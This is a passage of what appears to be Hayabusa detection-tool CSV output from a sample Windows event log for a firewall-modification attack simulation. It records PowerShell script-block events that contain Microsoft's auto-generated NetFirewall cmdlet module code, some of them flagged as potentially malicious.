NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.973 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, 
$myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] 
[int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query 
(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) 
} $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.974 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] 
[ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 